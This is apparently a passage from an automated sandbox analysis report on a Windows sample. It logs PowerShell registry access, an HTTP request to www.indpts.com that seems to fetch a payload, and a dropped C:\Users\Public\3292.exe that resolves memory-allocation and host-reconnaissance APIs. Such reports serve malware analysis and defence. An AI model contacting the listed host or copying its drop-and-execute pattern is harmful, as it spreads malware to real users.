Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 9
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Users\Public\3292.exe show_window = SW_SHOWNORMAL True 1
Module (3)
Operation Module Additional Information Success Count
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 1
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
System (8)
Operation Additional Information Success Count
Get Computer Name result_out = YKYD69Q True 1
Get Info type = Operating System False 6
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Mutex (24)
Operation Additional Information Success Count
Create mutex_name = Global\.net clr networking True 10
Create mutex_name = Global\.net clr networking False 1
Create mutex_name = Global\.net clr networking True 5
Release - True 1
Release mutex_name = Global\.net clr networking True 2
Release mutex_name = Global\.net clr networking True 5
Environment (100)
Operation Additional Information Success Count
Get Environment String name = MshEnableTrace False 91
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Get Environment String name = PubLic, result_out = C:\Users\Public True 2
Get Environment String name = PubLIC, result_out = C:\Users\Public True 2
Get Environment String name = public, result_out = C:\Users\Public True 2
Set Environment String name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Network Behavior
DNS (1)
Operation Additional Information Success Count
Resolve Name host = www.indpts.com, address_out = 108.163.227.35 True 1
TCP Sessions (1)
Information Value
Total Data Sent 0.07 KB (69 bytes)
Total Data Received 0.00 KB (0 bytes)
Contacted Host Count 1
Contacted Hosts 108.163.227.35:80
TCP Session #1
Information Value
Handle 0x4dc
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 108.163.227.35
Remote Port 80
Local Address 0.0.0.0
Local Port 2496
Data Sent 0.07 KB (69 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Connect remote_address = 108.163.227.35, remote_port = 80 True 1
Send flags = NO_FLAG_SET, size = 69, size_out = 69 True 1
Close type = SOCK_STREAM True 1
HTTP Sessions (1)
Information Value
Total Data Sent 0.07 KB (69 bytes)
Total Data Received 0.00 KB (0 bytes)
Contacted Host Count 1
Contacted Hosts www.indpts.com
HTTP Session #1
Information Value
Server Name www.indpts.com
Server Port 80
Data Sent 0.07 KB (69 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Open Connection protocol = http, server_name = www.indpts.com, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /UHSD/ True 1
Send HTTP Request headers = host: www.indpts.com, connection: Keep-Alive, url = www.indpts.com/UHSD/ True 1
Close Session - True 1
Process #4: 3292.exe
(Host: 59, Network: 0)
Information Value
ID #4
File Name c:\users\public\3292.exe
Command Line "C:\Users\Public\3292.exe"
Initial Working Directory C:\Users\aETAdzjz\Desktop\
Monitor Start Time: 00:00:28, Reason: Child Process
Unmonitor End Time: 00:02:23, Reason: Terminated by Timeout
Monitor Duration 00:01:55
OS Process Information
Information Value
PID 0xb2c
Parent PID 0xaec (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Groups
  • YKYD69Q\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010636 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0xB30
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00061fff Pagefile Backed Memory Readable True False False
locale.nls 0x00070000 0x000d6fff Memory Mapped File Readable False False False
private_0x00000000000e0000 0x000e0000 0x000f1fff Private Memory Readable, Writable True True False
private_0x0000000000100000 0x00100000 0x0010dfff Private Memory Readable, Writable, Executable True True False
private_0x0000000000110000 0x00110000 0x0011dfff Private Memory Readable, Writable True True False
private_0x0000000000120000 0x00120000 0x0012ffff Private Memory Readable, Writable, Executable True True False
private_0x0000000000170000 0x00170000 0x001affff Private Memory Readable, Writable True True False
private_0x0000000000260000 0x00260000 0x0026ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000270000 0x00270000 0x0034efff Pagefile Backed Memory Readable True False False
private_0x0000000000360000 0x00360000 0x0045ffff Private Memory Readable, Writable True True False
private_0x0000000000460000 0x00460000 0x0055ffff Private Memory Readable, Writable True True False
private_0x00000000005b0000 0x005b0000 0x0062ffff Private Memory Readable, Writable True True False
private_0x0000000000780000 0x00780000 0x0087ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000880000 0x00880000 0x00a07fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a10000 0x00a10000 0x00b90fff Pagefile Backed Memory Readable True False False
3292.exe 0x00be0000 0x00bfefff Memory Mapped File Readable, Writable, Executable True True False
pagefile_0x0000000000c00000 0x00c00000 0x01ffffff Pagefile Backed Memory Readable True False False
private_0x00000000021d0000 0x021d0000 0x021dffff Private Memory Readable, Writable True True False
sortdefault.nls 0x021e0000 0x024aefff Memory Mapped File Readable False False False
private_0x00000000024b0000 0x024b0000 0x026cffff Private Memory Readable, Writable True True False
private_0x00000000026d0000 0x026d0000 0x02aa0fff Private Memory Readable, Writable True True False
uxtheme.dll 0x74650000 0x746cffff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x746e0000 0x746e7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x746f0000 0x7474bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74750000 0x7478efff Memory Mapped File Readable, Writable, Executable False False False
winspool.drv 0x74800000 0x74850fff Memory Mapped File Readable, Writable, Executable False False False
winmm.dll 0x74860000 0x74891fff Memory Mapped File Readable, Writable, Executable False False False
msacm32.dll 0x748a0000 0x748b3fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x74dc0000 0x74dcbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x74dd0000 0x74e2ffff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x74e30000 0x74e8ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x74e90000 0x74ea8fff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x750d0000 0x75126fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x75130000 0x751bffff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75250000 0x75295fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x752a0000 0x7534bfff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75450000 0x755abfff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x755b0000 0x7564cfff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x756e0000 0x7577ffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x75780000 0x75789fff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75790000 0x7588ffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759f0000 0x75afffff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x75b00000 0x75bcbfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x76b60000 0x76beefff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76d80000 0x76e6ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000076e70000 0x76e70000 0x76f69fff Private Memory Readable, Writable, Executable True True False
private_0x0000000076f70000 0x76f70000 0x7708efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77090000 0x77238fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77270000 0x773effff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Host Behavior
Module (39)
Operation Module Additional Information Success Count
Load msvcrt.dll base_address = 0x752a0000 True 1
Load KERNEL32.dll base_address = 0x759f0000 True 1
Load USER32.dll base_address = 0x75790000 True 1
Load ADVAPI32.dll base_address = 0x756e0000 True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x45f884 True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x45f8bc True 1
Get Address - function = LoadLibraryA, ordinal = 0, address_out = 0x45f92c True 1
Get Address - function = UnmapViewOfFile, ordinal = 0, address_out = 0x45f92c True 1
Get Address - function = GetProcAddress, ordinal = 0, address_out = 0x45f92c True 1
Get Address - function = VirtualAlloc, ordinal = 0, address_out = 0x45f92c True 1
Get Address - function = VirtualProtect, ordinal = 0, address_out = 0x45f92c True 1
Get Address - function = AddVectoredExceptionHandler, ordinal = 0, address_out = 0x45f92c True 1
Get Address - function = RemoveVectoredExceptionHandler, ordinal = 0, address_out = 0x45f92c True 1
Get Address c:\windows\syswow64\msvcrt.dll function = strchr, address_out = 0x752adbeb True 1
Get Address c:\windows\syswow64\msvcrt.dll function = free, address_out = 0x752a9894 True 1
Get Address c:\windows\syswow64\msvcrt.dll function = malloc, address_out = 0x752a9cee True 1
Get Address c:\windows\syswow64\kernel32.dll function = FreeConsole, address_out = 0x75aa6aa8 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenW, address_out = 0x75a01700 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatW, address_out = 0x75a2828e True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x75a04435 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpW, address_out = 0x75a05929 True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x75a23102 True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x75a054ee True 1
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x75a04442 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x75a01245 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x75a014b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameA, address_out = 0x75a1b6e0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameExA, address_out = 0x75a842ef True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x75a05a4b True 1
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpA, address_out = 0x75a1eceb True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x75a011c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x75a014e9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7729e026 True 1
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x75a014c9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x75a011a9 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x75a01809 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x75a011f8 True 1
Get Address c:\windows\syswow64\user32.dll function = wsprintfA, address_out = 0x757bae5f True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameA, address_out = 0x7570a4b4 True 1
System (13)
Operation Additional Information Success Count
Get Computer Name result_out = YKYD69Q True 1
